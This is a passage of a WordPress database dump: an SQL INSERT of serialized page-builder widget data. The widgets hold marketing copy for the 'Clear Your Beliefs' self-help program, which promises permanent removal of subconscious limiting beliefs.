]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1604, 2042, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:61417:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for 